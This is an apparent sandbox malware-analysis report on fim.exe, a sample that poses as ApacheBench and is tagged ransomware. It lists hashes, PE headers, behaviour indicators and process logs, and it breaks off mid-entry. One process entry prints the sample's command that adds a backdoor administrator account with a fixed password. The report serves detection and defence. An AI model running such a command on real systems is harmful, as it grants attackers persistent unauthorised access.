General Info

File name

fim.exe

Full analysis
https://app.any.run/tasks/7d86ac98-68e5-407f-942e-25908a66ad7f
Verdict
Malicious activity
Analysis date
6/12/2019, 01:14:40
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

ransomware

Indicators:

MIME:
application/x-dosexec
File info:
PE32 executable (GUI) Intel 80386, for MS Windows
MD5

dabb425a1060370dd48ff517dcf6ac19

SHA1

0d09f4071aa38b0f4a9cf042e6c248cc569bd609

SHA256

e28fd570fa1d50298173d216eae9bf8be2c5551ff778dde896a36707ae107728

SSDEEP

1536:IclmZYPVFFqsZLJIO6clezeZ/cn/Mb+KR0Nc8QsJq39:5IZOVF1FSclLse0Nc8QsC9

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
60 seconds
Additional time used
none
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (73.0.3683.75)
  • Google Update Helper (1.3.33.23)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 65.0.2 (x86 en-US) (65.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Changes the autorun value in the registry
  • reg.exe (PID: 1692)
Starts NET.EXE to view/add/change user profiles
  • cmd.exe (PID: 2416)
Application launched itself
  • Skype.exe (PID: 2116)
  • Skype.exe (PID: 2752)
  • Skype.exe (PID: 3640)
Creates files in the user directory
  • Skype.exe (PID: 2752)
  • Skype.exe (PID: 2116)
  • Skype.exe (PID: 3640)
Modifies the open verb of a shell class
  • Skype.exe (PID: 3640)
Uses REG.EXE to modify Windows registry
  • Skype.exe (PID: 3640)
Reads CPU info
  • Skype.exe (PID: 3640)
Creates files like Ransomware instruction
  • WINWORD.EXE (PID: 2700)
Starts CMD.EXE for commands execution
  • fim.exe (PID: 3316)
Reads settings of System Certificates
  • Skype.exe (PID: 3640)
Manual execution by user
  • Skype.exe (PID: 3640)
  • WINWORD.EXE (PID: 2700)
Creates files in the user directory
  • WINWORD.EXE (PID: 2700)
Reads Microsoft Office registry keys
  • WINWORD.EXE (PID: 2700)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.exe
|   Win32 Executable MS Visual C++ (generic) (42.2%)
.exe
|   Win64 Executable (generic) (37.3%)
.dll
|   Win32 Dynamic Link Library (generic) (8.8%)
.exe
|   Win32 Executable (generic) (6%)
.exe
|   Generic Win/DOS Executable (2.7%)
EXIF
EXE
MachineType:
Intel 386 or later, and compatibles
TimeStamp:
2009:08:13 12:08:34+02:00
PEType:
PE32
LinkerVersion:
6
CodeSize:
45056
InitializedDataSize:
40960
UninitializedDataSize:
null
EntryPoint:
0x50bd
OSVersion:
4
ImageVersion:
null
SubsystemVersion:
4
Subsystem:
Windows GUI
FileVersionNumber:
2.2.14.0
ProductVersionNumber:
2.2.14.0
FileFlagsMask:
0x003f
FileFlags:
(none)
FileOS:
Win32
ObjectFileType:
Executable application
FileSubtype:
null
LanguageCode:
English (U.S.)
CharacterSet:
Unicode
Comments:
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
CompanyName:
Apache Software Foundation
FileDescription:
ApacheBench command line utility
FileVersion:
2.2.14
InternalName:
ab.exe
LegalCopyright:
Copyright 2009 The Apache Software Foundation.
OriginalFileName:
ab.exe
ProductName:
Apache HTTP Server
ProductVersion:
2.2.14
Summary
Architecture:
IMAGE_FILE_MACHINE_I386
Subsystem:
IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date:
13-Aug-2009 10:08:34
Detected languages
English - United States
Debug artifacts
0\asf\release\build-2.2.14\support\Release\ab.pdb
Comments:
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
CompanyName:
Apache Software Foundation
FileDescription:
ApacheBench command line utility
FileVersion:
2.2.14
InternalName:
ab.exe
LegalCopyright:
Copyright 2009 The Apache Software Foundation.
OriginalFilename:
ab.exe
ProductName:
Apache HTTP Server
ProductVersion:
2.2.14
DOS Header
Magic number:
MZ
Bytes on last page of file:
0x0090
Pages in file:
0x0003
Relocations:
0x0000
Size of header:
0x0004
Min extra paragraphs:
0x0000
Max extra paragraphs:
0xFFFF
Initial SS value:
0x0000
Initial SP value:
0x00B8
Checksum:
0x0000
Initial IP value:
0x0000
Initial CS value:
0x0000
Overlay number:
0x0000
OEM identifier:
0x0000
OEM information:
0x0000
Address of NE header:
0x000000E8
PE Headers
Signature:
PE
Machine:
IMAGE_FILE_MACHINE_I386
Number of sections:
4
Time date stamp:
13-Aug-2009 10:08:34
Pointer to Symbol Table:
0x00000000
Number of symbols:
0
Size of Optional Header:
0x00E0
Characteristics
IMAGE_FILE_32BIT_MACHINE
IMAGE_FILE_EXECUTABLE_IMAGE
IMAGE_FILE_LINE_NUMS_STRIPPED
IMAGE_FILE_LOCAL_SYMS_STRIPPED
IMAGE_FILE_RELOCS_STRIPPED
Sections
Name Virtual Address Virtual Size Raw Size Charateristics Entropy
.text 0x00001000 0x0000A966 0x0000B000 IMAGE_SCN_CNT_CODE,IMAGE_SCN_MEM_EXECUTE,IMAGE_SCN_MEM_READ 7.01583
.rdata 0x0000C000 0x00000FE6 0x00001000 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ 5.31839
.data 0x0000D000 0x0000705C 0x00004000 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ,IMAGE_SCN_MEM_WRITE 4.40784
.rsrc 0x00015000 0x000007C8 0x00001000 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ 1.9583
Resources
1

Imports
    MSVCRT.dll

    KERNEL32.dll

    ADVAPI32.dll

    WSOCK32.dll

    WS2_32.dll

Exports

    No exports.

Screenshots

Processes

Total processes
48
Monitored processes
13
Malicious processes
1
Suspicious processes
0

Behavior graph

+
start fim.exe no specs cmd.exe no specs net.exe no specs net1.exe no specs winword.exe no specs skype.exe skype.exe reg.exe skype.exe no specs reg.exe no specs skype.exe skype.exe no specs skype.exe
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
3316
CMD
"C:\Users\admin\AppData\Local\Temp\fim.exe"
Path
C:\Users\admin\AppData\Local\Temp\fim.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Apache Software Foundation
Description
ApacheBench command line utility
Version
2.2.14
Modules
Image
c:\users\admin\appdata\local\temp\fim.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\apphelp.dll

PID
2416
CMD
cmd.exe /k "net user /add di.security Disecurity1! && net localgroup administrators di.security /add"
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
fim.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\net.exe

PID
1868
CMD
net user /add di.security Disecurity1!
Path
C:\Windows\system32\net.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
2
Version:
Company
Microsoft Corporation
Description
Net Command
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\net.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\netutils.dll
c:\windows\system32\browcli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\mpr.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\net1.exe

PID
1136
CMD
C:\Windows\system32\net1 user /add di.security Disecurity1!
Path
C:\Windows\system32\net1.exe
Indicators
No indicators
Parent process
net.exe
User
admin
Integrity Level
MEDIUM
Exit code
2
Version:
Company
Microsoft Corporation
Description
Net Command
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\net1.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dsrole.dll
c:\windows\system32\netutils.dll
c:\windows\system32\logoncli.dll
c:\windows\system32\browcli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\samlib.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\netmsg.dll

PID
2700
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\threadmeet.rtf"
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\apphelp.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\winspool.drv
c:\windows\system32\shell32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\fontsub.dll
c:\windows\system32\prntvpt.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\program files\microsoft office\office14\msproof7.dll
c:\program files\microsoft office\office14\proof\1033\msgr3en.dll
c:\program files\microsoft office\office14\gkword.dll
c:\windows\system32\oleacc.dll
c:\program files\common files\system\ado\msadox.dll
c:\windows\system32\netutils.dll

PID
3640
CMD
"C:\Program Files\Microsoft\Skype for Desktop\Skype.exe"
Path
C:\Program Files\Microsoft\Skype for Desktop\Skype.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Skype Technologies S.A.
Description
Skype
Version
8.29.0.50
Modules
Image
c:\program files\microsoft\skype for desktop\skype.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft\skype for desktop\node.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\program files\microsoft\skype for desktop\msvcp140.dll
c:\program files\microsoft\skype for desktop\vcruntime140.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-runtime-l1-1-0.dll
c:\program files\microsoft\skype for desktop\ucrtbase.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-localization-l1-2-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-processthreads-l1-1-1.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-file-l1-2-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-timezone-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-file-l2-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-synch-l1-2-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-string-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-heap-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-stdio-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-convert-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-locale-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-math-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-multibyte-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-time-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-filesystem-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-environment-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-utility-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-conio-l1-1-0.dll
c:\windows\system32\psapi.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winmm.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\oleacc.dll
c:\program files\microsoft\skype for desktop\ffmpeg.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\version.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\winspool.drv
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\mscms.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\audioses.dll
c:\windows\system32\mmdevapi.dll
c:\windows\system32\propsys.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\winsta.dll
c:\windows\system32\iconcodecservice.dll
c:\windows\system32\windowscodecs.dll
c:\program files\microsoft\skype for desktop\resources\app.asar.unpacked\node_modules\keytar\build\release\keytar.node
c:\program files\microsoft\skype for desktop\resources\app.asar.unpacked\node_modules\electron-ssid\build\release\electron-ssid.node
c:\windows\system32\wlanapi.dll
c:\windows\system32\wlanutil.dll
c:\windows\system32\devenum.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\avicap32.dll
c:\windows\system32\msvfw32.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\cryptnet.dll

PID
2140
CMD
"C:\Program Files\Microsoft\Skype for Desktop\Skype.exe" --reporter-url=https://rink.hockeyapp.net/api/2/apps/a741743329d94bc08826af367733939d/crashes/upload --application-name=skype-preview "--crashes-directory=C:\Users\admin\AppData\Local\Temp\skype-preview Crashes" --v=1
Path
C:\Program Files\Microsoft\Skype for Desktop\Skype.exe
Indicators
Parent process
Skype.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Skype Technologies S.A.
Description
Skype
Version
8.29.0.50
Modules
Image
c:\program files\microsoft\skype for desktop\skype.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft\skype for desktop\node.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\program files\microsoft\skype for desktop\msvcp140.dll
c:\program files\microsoft\skype for desktop\vcruntime140.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-runtime-l1-1-0.dll
c:\program files\microsoft\skype for desktop\ucrtbase.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-localization-l1-2-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-processthreads-l1-1-1.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-file-l1-2-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-timezone-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-file-l2-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-core-synch-l1-2-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-string-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-heap-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-stdio-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-convert-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-locale-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-math-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-multibyte-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-time-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-filesystem-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-environment-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-utility-l1-1-0.dll
c:\program files\microsoft\skype for desktop\api-ms-win-crt-conio-l1-1-0.dll
c:\windows\system32\psapi.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winmm.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\oleacc.dll
c:\program files\microsoft\skype for desktop\ffmpeg.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\version.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\winspool.drv
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\msctf.dll
c:\windows\system32\imm32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\devobj.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\wshqos.dll

PID
1692
CMD
C:\Windows\system32\reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Skype for Desktop" /t REG_SZ /d "C:\Program Files\Microsoft\Skype for Desktop\Skype.exe" /f
Path
C:\Windows\system32\reg.exe
Indicators
Parent process
Skype.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Registry Console Tool
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\reg.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\lpk.dll
c:\windows\system32\nsi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2752
CMD
